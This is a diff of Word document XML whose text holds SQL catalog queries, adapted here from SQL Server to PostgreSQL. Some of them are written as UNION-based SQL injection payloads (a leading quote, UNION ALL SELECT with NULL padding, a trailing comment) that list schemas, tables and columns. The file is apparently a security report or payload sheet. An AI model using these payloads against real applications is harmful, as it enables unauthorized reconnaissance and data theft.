+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>s.nspname</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> || '-' || </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>t.relname</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    '2001-01-01', </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>c.attname</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> || '-' || </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    CAST(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>c.attlen</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> AS VARCHAR) || '-' || </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    CASE WHEN </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>c.attnotnull</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> THEN '0' ELSE '1' END</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
               <w:t xml:space="preserve">FROM </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>sys.columns</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>pg_attribute</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> c </w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> c</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2873,16 +3175,14 @@
               <w:t xml:space="preserve">JOIN </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>sys.tables</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>pg_class</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -2891,21 +3191,12 @@
               <w:t xml:space="preserve"> t ON </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>c.object</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>_id</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>c.attrelid</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
@@ -2916,23 +3207,185 @@
               <w:t xml:space="preserve"> = </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>t.object</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>_id</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>t.oid</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">JOIN </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>pg_namespace</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> s ON </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>t.relnamespace</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>s.oid</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">JOIN </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>pg_type</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> ty ON </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>c.atttypid</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>ty.oid</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">WHERE </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>c.attnum</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> &gt; 0 </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  AND NOT </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>c.attisdropped</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -2954,728 +3407,49 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve">JOIN </w:t>
+              <w:t xml:space="preserve">  AND </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>sys.schemas</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>t.relkind</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> s ON </w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = 'r'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  AND </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>t.schema</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>_id</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>s.nspname</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>s.schema</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>_id</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">JOIN </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>sys.types</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> ty ON </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>c.user_type_id</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>ty.user_type_id</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>--</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>###PostgreSQL</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>' UNION ALL</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">SELECT </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    NULL, NULL, NULL, NULL, </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>s.nspname</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> || '-' || </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>t.relname</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    '2001-01-01', </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>c.attname</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> || '-' || </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
